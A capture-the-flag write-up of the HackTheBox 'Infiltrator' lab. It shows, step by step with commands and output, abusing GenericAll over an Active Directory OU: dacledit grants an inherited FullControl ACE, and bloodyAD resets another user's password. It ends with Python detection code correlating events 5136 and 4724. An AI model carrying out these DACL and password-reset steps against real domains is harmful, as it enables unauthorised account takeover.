GenericAll


During domain enumeration with BloodHound, it was identified that the d.anderson user holds the GenericAll privilege over the Marketing Digital OU.

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ echo -e '[realms]\n\n\tINFILTRATOR.HTB = {\n\t\tkdc = dc01.infiltrator.htb\n\t}' | sudo tee /etc/krb5.conf
[realms]
 
	INFILTRATOR.HTB = {
		kdc = dc01.infiltrator.htb
	}

Setting up the /etc/krb5.conf file with the KDC for the INFILTRATOR.HTB realm, so that the Kerberos-authenticated tools below can find dc01.infiltrator.htb.

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=d.anderson@dc01.infiltrator.htb.ccache bloodyAD -d INFILTRATOR.HTB -k --host dc01.infiltrator.htb get writable --detail  
 
[...REDACTED...]
 
distinguishedName: OU=Marketing Digital,DC=infiltrator,DC=htb
device: CREATE_CHILD
ipNetwork: CREATE_CHILD
organizationalUnit: CREATE_CHILD
intellimirrorGroup: CREATE_CHILD
msImaging-PSPs: CREATE_CHILD
msCOM-PartitionSet: CREATE_CHILD
remoteStorageServicePoint: CREATE_CHILD
nTFRSSettings: CREATE_CHILD
remoteMailRecipient: CREATE_CHILD
msTAPI-RtConference: CREATE_CHILD
inetOrgPerson: CREATE_CHILD
domainPolicy: CREATE_CHILD
msTAPI-RtPerson: CREATE_CHILD
msDS-App-Configuration: CREATE_CHILD
container: CREATE_CHILD
printQueue: CREATE_CHILD
indexServerCatalog: CREATE_CHILD
ipsecPolicy: CREATE_CHILD
volume: CREATE_CHILD
groupOfNames: CREATE_CHILD
msDS-ManagedServiceAccount: CREATE_CHILD
contact: CREATE_CHILD
msieee80211-Policy: CREATE_CHILD
document: CREATE_CHILD
person: CREATE_CHILD
mSMQMigratedUser: CREATE_CHILD
mS-SQL-OLAPServer: CREATE_CHILD
mS-SQL-SQLServer: CREATE_CHILD
organizationalPerson: CREATE_CHILD
msExchConfigurationContainer: CREATE_CHILD
msDS-GroupManagedServiceAccount: CREATE_CHILD
nisMap: CREATE_CHILD
nisObject: CREATE_CHILD
groupPolicyContainer: CREATE_CHILD
msDS-AzAdminManager: CREATE_CHILD
room: CREATE_CHILD
ipService: CREATE_CHILD
ipProtocol: CREATE_CHILD
msPKI-Key-Recovery-Agent: CREATE_CHILD
applicationVersion: CREATE_CHILD
residentialPerson: CREATE_CHILD
msMQ-Group: CREATE_CHILD
group: CREATE_CHILD
oncRpc: CREATE_CHILD
serviceConnectionPoint: CREATE_CHILD
msDS-AppData: CREATE_CHILD
rRASAdministrationConnectionPoint: CREATE_CHILD
locality: CREATE_CHILD
msDS-ShadowPrincipalContainer: CREATE_CHILD
classStore: CREATE_CHILD
account: CREATE_CHILD
user: CREATE_CHILD
msMQ-Custom-Recipient: CREATE_CHILD
rFC822LocalPart: CREATE_CHILD
groupOfUniqueNames: CREATE_CHILD
ipsecNegotiationPolicy: CREATE_CHILD
ipsecNFA: CREATE_CHILD
documentSeries: CREATE_CHILD
rpcContainer: CREATE_CHILD
serviceAdministrationPoint: CREATE_CHILD
intellimirrorSCP: CREATE_CHILD
organizationalRole: CREATE_CHILD
msCOM-Partition: CREATE_CHILD
ipsecFilter: CREATE_CHILD
physicalLocation: CREATE_CHILD
computer: CREATE_CHILD
nisNetgroup: CREATE_CHILD
applicationEntity: CREATE_CHILD
dSA: CREATE_CHILD
ipsecISAKMPPolicy: CREATE_CHILD
thumbnailLogo: WRITE
msDS-ObjectSoa: WRITE
msDS-SourceAnchor: WRITE
msDS-CloudAnchor: WRITE
msDS-LastKnownRDN: WRITE
isRecycled: WRITE
msDS-NcType: WRITE
msCOM-UserPartitionSetLink: WRITE
mS-DS-ConsistencyChildCount: WRITE
mS-DS-ConsistencyGuid: WRITE
otherWellKnownObjects: WRITE
dSCorePropagationData: WRITE
proxiedObjectName: WRITE
uSNSource: WRITE
gPOptions: WRITE
gPLink: WRITE
uPNSuffixes: WRITE
isCriticalSystemObject: WRITE
lastKnownParent: WRITE
url: WRITE
partialAttributeDeletionList: WRITE
managedBy: WRITE
partialAttributeSet: WRITE
wellKnownObjects: WRITE
defaultGroup: WRITE
systemFlags: WRITE
fSMORoleOwner: WRITE
desktopProfile: WRITE
wbemPath: WRITE
revision: WRITE
flags: WRITE
countryCode: WRITE
replUpToDateVector: WRITE
replPropertyMetaData: WRITE
objectGUID: WRITE
name: WRITE
USNIntersite: WRITE
wWWHomePage: WRITE
displayNamePrintable: WRITE
uSNDSALastObjRemoved: WRITE
extensionName: WRITE
adminDescription: WRITE
proxyAddresses: WRITE
adminDisplayName: WRITE
showInAdvancedViewOnly: WRITE
co: WRITE
uSNLastObjRem: WRITE
uSNChanged: WRITE
repsFrom: WRITE
repsTo: WRITE
objectVersion: WRITE
dSASignature: WRITE
isDeleted: WRITE
uSNCreated: WRITE
displayName: WRITE
subRefs: WRITE
whenChanged: WRITE
whenCreated: WRITE
dn: WRITE
userPassword: WRITE
seeAlso: WRITE
preferredDeliveryMethod: WRITE
destinationIndicator: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
businessCategory: WRITE
searchGuide: WRITE
description: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE
cn: WRITE
objectCategory: WRITE
nTSecurityDescriptor: WRITE
instanceType: WRITE
ou: WRITE
objectClass: WRITE
OWNER: WRITE
DACL: WRITE

Confirming the privilege with bloodyAD and reviewing the details: d.anderson can create child objects of every class under the OU and write its attributes, including nTSecurityDescriptor, OWNER and DACL.

Generic Descendent Object Takeover


The simplest and most straightforward way to abuse control of the OU is to apply a GenericAll ACE on the OU that will inherit down to all object types. This can be done using Impacket's dacledit (cf. "grant rights" reference for the link).

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ python3 -m venv myVenv ; source ./myVenv/bin/activate ; cd myVenv
 
┌──(myVenv)─(kali㉿kali)-[~/…/htb/labs/infiltrator/myVenv]
└─$ git clone https://github.com/fortra/impacket ; cd impacket ; pip3 install -e .
 
┌──(myVenv)─(kali㉿kali)-[~/…/labs/infiltrator/myVenv/impacket]
└─$ KRB5CCNAME=../../d.anderson@dc01.infiltrator.htb.ccache dacledit.py INFILTRATOR.HTB/d.anderson@dc01.infiltrator.htb -k -no-pass -dc-ip $IP -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' -debug 
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra
 
[+] Impacket Library Installation Path: /home/kali/archive/htb/labs/infiltrator/myVenv/impacket/impacket
[+] Using Kerberos Cache: ../../d.anderson@dc01.infiltrator.htb.ccache
[+] SPN LDAP/DC01@INFILTRATOR.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[+] Using TGT from cache
[+] Trying to connect to KDC at 10.10.11.31:88
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[+] Initializing domainDumper()
[+] Target principal found in LDAP (OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB)
[+] Found principal SID: S-1-5-21-2606098828-3734741516-3625406802-1103
[+] Appending ACE (S-1-5-21-2606098828-3734741516-3625406802-1103 --(FullControl)--> None)
[+] ACE created.
[*] DACL backed up to dacledit-20240901-172635.bak
[+] Attempts to modify the Security Descriptor.
[*] DACL modified successfully!

Now, the d.anderson user has full control of all descendant objects of every type under the OU, which includes the e.rodriguez user. As the tool output notes, objects with adminCount=1 are the exception: they do not inherit ACEs from their parent container/OU.

Password Reset


┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=d.anderson@dc01.infiltrator.htb.ccache bloodyAD -v DEBUG -d INFILTRATOR.HTB -k --host dc01.infiltrator.htb set password e.rodriguez 'Qwer1234'        
[+] Password changed successfully!

I can then reset the password of the descendant object, e.rodriguez.

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT INFILTRATOR.HTB/e.rodriguez@dc01.infiltrator.htb -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: Qwer1234
[*] Saving ticket in e.rodriguez@dc01.infiltrator.htb.ccache

Successfully validated: a TGT was generated for the e.rodriguez user.
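From the defender's side, the two modifications above leave a distinctive pair of Security-log events: Event ID 5136 (directory service object modified) for the write to the OU's nTSecurityDescriptor, followed by Event ID 4724 (password reset attempt) by the same principal against an account beneath that OU. The following is an added example, not part of the original writeup, that correlates constructed records of those two events; the account-to-DN lookup, the allow-list of expected DACL editors and the one-hour window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed lookup, as a directory export would provide: sAMAccountName -> DN.
ACCOUNT_DN = {"e.rodriguez": "CN=E.Rodriguez,OU=Marketing Digital,DC=infiltrator,DC=htb"}

# Constructed Security-log records. Field names follow the EventData of
# 5136 (directory service object modified) and 4724 (password reset attempt).
SAMPLE_EVENTS = [
    {"EventID": 5136, "TimeCreated": "2024-09-01T17:26:35", "SubjectUserName": "d.anderson",
     "ObjectClass": "organizationalUnit", "ObjectDN": "OU=Marketing Digital,DC=infiltrator,DC=htb",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4724, "TimeCreated": "2024-09-01T17:31:02", "SubjectUserName": "d.anderson",
     "TargetUserName": "e.rodriguez"},
    # Reset by a different principal with no preceding DACL write of its own: no alert.
    {"EventID": 4724, "TimeCreated": "2024-09-01T17:40:00", "SubjectUserName": "helpdesk01",
     "TargetUserName": "e.rodriguez"},
]

EXPECTED_DACL_EDITORS = {"administrator"}  # assumed allow-list; tune per domain
WINDOW = timedelta(hours=1)  # a reset this long after the DACL write is still linked to it

def under_ou(dn, ou_dn):
    """True if dn is the OU itself or any descendant of it (case-insensitive DN suffix match)."""
    dn, ou_dn = dn.lower(), ou_dn.lower()
    return dn == ou_dn or dn.endswith("," + ou_dn)

def is_ou_dacl_write(e):
    """5136 on an OU's nTSecurityDescriptor by a principal not expected to edit DACLs."""
    return (e["EventID"] == 5136 and e["ObjectClass"] == "organizationalUnit"
            and e["AttributeLDAPDisplayName"] == "nTSecurityDescriptor"
            and e["SubjectUserName"].lower() not in EXPECTED_DACL_EDITORS)

def correlate(events, account_dn=ACCOUNT_DN, window=WINDOW):
    """Flag resets beneath an OU whose DACL the same principal changed shortly before."""
    dacl_writes = [e for e in events if is_ou_dacl_write(e)]
    alerts = []
    for reset in (e for e in events if e["EventID"] == 4724):
        target_dn = account_dn.get(reset["TargetUserName"].lower())
        if target_dn is None:
            continue  # unknown account; cannot place it under an OU
        for w in dacl_writes:
            delay = datetime.fromisoformat(reset["TimeCreated"]) - datetime.fromisoformat(w["TimeCreated"])
            if (w["SubjectUserName"].lower() == reset["SubjectUserName"].lower()
                    and under_ou(target_dn, w["ObjectDN"]) and timedelta(0) <= delay <= window):
                alerts.append({"actor": w["SubjectUserName"], "ou": w["ObjectDN"],
                               "target": reset["TargetUserName"],
                               "minutes_after_dacl_write": delay.total_seconds() / 60})
    return alerts
```

Event 5136 is only written when the Directory Service Changes audit subcategory is enabled and the object's SACL covers the write, so check that auditing is in place before relying on this correlation.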